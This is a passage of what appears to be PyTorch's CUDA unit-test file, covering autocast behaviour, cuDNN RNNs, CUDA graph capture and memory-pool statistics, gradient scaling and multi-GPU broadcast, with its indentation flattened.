self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.autocast('cuda', ):
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
        # The JIT here doesn't really matter; we just need to call
        # cat via the boxed API.
model = Model()
model_jit_script = torch.jit.script(model)
with torch.autocast('cuda', enabled=True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.autocast('cuda', ):
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
                # Autocast wrapper requires that at::_cudnn_rnn be autograd-exposed. This check can't
                # guarantee at::_cudnn_rnn is autograd-exposed, but if it fails, it indicates some funny
                # business has occurred and we should double-check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
        # Checks that autocast does not keep re-caching the same parameters
        # when the model is executed inside a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.autocast('cuda', ):
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.autocast('cuda', ):
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
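        # func_with_temps computes (t + val) + (t + val) = 2*t + 2*val, so starting from
        # ones, ten applications with val=1 reach 3070 per element and six applications
        # with val=3 reach 442, matching the sums asserted below.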
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
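        # func_with_temps maps t -> 2*t + 2*val: five applications with val=1 reach 94
        # per element and five with val=2 reach 156, the values checked after replay.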
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
g2 = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda.CUDAGraph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
            # potential_problem's allocation should still be outstanding. If DeviceCachingAllocator::malloc
            # mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's
            # end-of-life event, which will cause the capture to fail with an error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
        # A dummy allocation triggers process_events, which should now successfully process b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
# warmup
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
torch.cuda.current_stream().wait_stream(s)
opt.zero_grad(set_to_none=True)
# capture
with torch.cuda.graph(g):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
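        # With GradScaler defaults (growth_factor=2.0, backoff_factor=0.5, growth_interval=2000),
        # the scale never grows within these four replays: grads of 5*4=20 and 5*2=10 stay finite,
        # while 20000*4 and 40000*2 exceed the fp16 maximum (~65504) and become inf, so each inf
        # halves the scale (4 -> 2 -> 1) and resets the growth tracker to 0.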
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_make_graphed_callables(self):
torch.manual_seed(5)
torch.cuda.manual_seed(5)
N, D_in, H, D_out = 640, 4096, 2048, 1024
models = []
for _ in range(2):
model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H),
torch.nn.Dropout(p=0.1)).cuda()
model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out),
torch.nn.Dropout(p=0.2)).cuda()
models.append(torch.nn.Sequential(model_section1, model_section2))
model_graphed = models[0]
model_control = models[1]
model_graphed.load_state_dict(model_control.state_dict())
opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1)
opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1)
x = torch.randn(N, D_in, device='cuda')
h = torch.randn(N, H, device='cuda', requires_grad=True)
y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True)
y = torch.randn(N, D_out, device='cuda')
loss_fn_control = torch.nn.functional.mse_loss
relu_control = torch.nn.functional.relu
# This is a good stress test. It graphs four callables: two Modules and two python functions.
model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \
torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control),
((x,), (h,), (y_pred,), (y_pred, y)))
real_inputs = [torch.rand_like(x) for _ in range(10)]
real_targets = [torch.rand_like(y) for _ in range(10)]
for m, opt, relu, loss_fn in zip((model_graphed, model_control),
(opt_graphed, opt_control),
(relu_graphed, relu_control),
(loss_fn_graphed, loss_fn_control)):
            # Resets RNG states before iterations for graphed and ungraphed models,
# so dropout math should be bitwise identical for both.
torch.manual_seed(5)
torch.cuda.manual_seed(5)
for data, target in zip(real_inputs, real_targets):
opt.zero_grad(set_to_none=True)
y_pred = m(data)
y_pred = relu(y_pred)
loss = loss_fn(y_pred, target)
loss.backward()
opt.step()
for p, pc in zip(model_graphed.parameters(), model_control.parameters()):
self.assertEqual(p, pc)
# We graphed the models in training mode. Eval should still run ungraphed.
model_graphed.eval()
model_control.eval()
self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0]))
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
            running_mean=None, running_var=None, momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
